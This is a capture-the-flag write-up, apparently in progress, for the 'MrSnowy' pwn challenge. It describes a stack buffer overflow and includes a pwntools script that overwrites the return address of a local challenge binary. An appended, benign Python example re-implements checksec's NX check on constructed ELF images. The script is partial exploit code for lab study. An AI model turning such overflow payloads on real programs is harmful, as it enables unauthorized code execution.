htb-santa-ctf/pwn/mrsnowy
2021-12-06 01:18:43 +01:00

MrSnowy

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me... He is always 👀 staring at Santa's house. Something must be wrong with him.

Flag

Progress so far

  • read() reads 0x108 bytes
  • The stack frame is 0x40 bytes, so the read overflows it
  • checksec --file=mrsnowy reports NX being enabled
    • So shellcode cannot be placed on the stack unless there is other executable space
    • This hints at ROP chaining
  • The binary should be patched to get rid of the time-consuming animation
    • Just nop the banner() function call
  • Overwriting the return pointer of investigate():
```python
from pwn import *
import ipdb

context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']
e = ELF("mr_snowy")
p = process(e.path)

def do_read():
    # drain output until the menu prompt '>' shows up
    while True:
        ll = p.read()
        print(ll)
        if b'>' in ll:
            break

# if not patched wait for the animation and send 1
do_read()
p.sendline(b'1')
do_read()

# write 0x48 bytes (0x40 frame + saved rbp) and overwrite the return pointer with the top of the stack frame
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))

# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()
```
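The NX conclusion above comes from checksec. The following is an added example, not part of the writeup, that reproduces that one check without external tools: it parses the ELF64 program headers and inspects the PT_GNU_STACK entry, which is exactly where the loader learns whether the stack may be executable. The two sample images are constructed inline (header plus program headers only) and are not the challenge binary; `nx_enabled` and `build_elf` are names chosen here.

```python
# Added example (not from the writeup): re-implement the NX check of checksec.
# NX is in force when a PT_GNU_STACK program header is present and lacks PF_X.
import struct

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4

# ELF64 file header and program header, little-endian, no padding.
EHDR_FMT = "<16sHHIQQQIHHHHHH"   # 64 bytes
PHDR_FMT = "<IIQQQQQQ"           # 56 bytes


def nx_enabled(elf: bytes) -> bool:
    """Return True when the stack is marked non-executable.

    A missing PT_GNU_STACK header is reported as False: the loader then
    falls back to its default, which on legacy setups is an executable
    stack, so the conservative reading is "not enforced".
    """
    if len(elf) < 64 or elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if elf[4] != 2 or elf[5] != 1:
        raise ValueError("only little-endian ELF64 is handled here")
    (_, _, _, _, _, phoff, _, _, _,
     phentsize, phnum, _, _, _) = struct.unpack_from(EHDR_FMT, elf, 0)
    for i in range(phnum):
        # Only p_type and p_flags are needed; they are the first two fields.
        p_type, p_flags = struct.unpack_from("<II", elf, phoff + i * phentsize)
        if p_type == PT_GNU_STACK:
            return not (p_flags & PF_X)
    return False


def build_elf(stack_flags: int, with_gnu_stack: bool = True) -> bytes:
    """Construct a tiny ELF64 image for testing (constructed sample, not a real binary)."""
    phdrs = [(PT_LOAD, PF_R | PF_X, 0, 0x400000, 0x400000, 0x1000, 0x1000, 0x1000)]
    if with_gnu_stack:
        phdrs.append((PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # ELF64, LE, version 1
    ehdr = struct.pack(EHDR_FMT, ident,
                       2,          # e_type = ET_EXEC
                       0x3E,       # e_machine = x86-64
                       1,          # e_version
                       0x400000,   # e_entry
                       64,         # e_phoff: program headers follow the file header
                       0, 0,       # e_shoff, e_flags
                       64, 56, len(phdrs),   # e_ehsize, e_phentsize, e_phnum
                       64, 0, 0)   # e_shentsize, e_shnum, e_shstrndx
    return ehdr + b"".join(struct.pack(PHDR_FMT, *ph) for ph in phdrs)


def report(elf: bytes) -> str:
    """Mirror checksec's wording for the NX column."""
    return "NX enabled" if nx_enabled(elf) else "NX disabled"


if __name__ == "__main__":
    samples = {
        "rw-stack": build_elf(PF_R | PF_W),
        "rwx-stack": build_elf(PF_R | PF_W | PF_X),
        "no-gnu-stack": build_elf(0, with_gnu_stack=False),
    }
    for name, img in samples.items():
        print(f"{name}: {report(img)}")
```

To check a real file, pass its bytes in: `report(open("mrsnowy", "rb").read())`. Note that this only tells you the stack is not executable; it says nothing about other segments, which is why the writeup's next step is to look for a ROP chain rather than another writable and executable region.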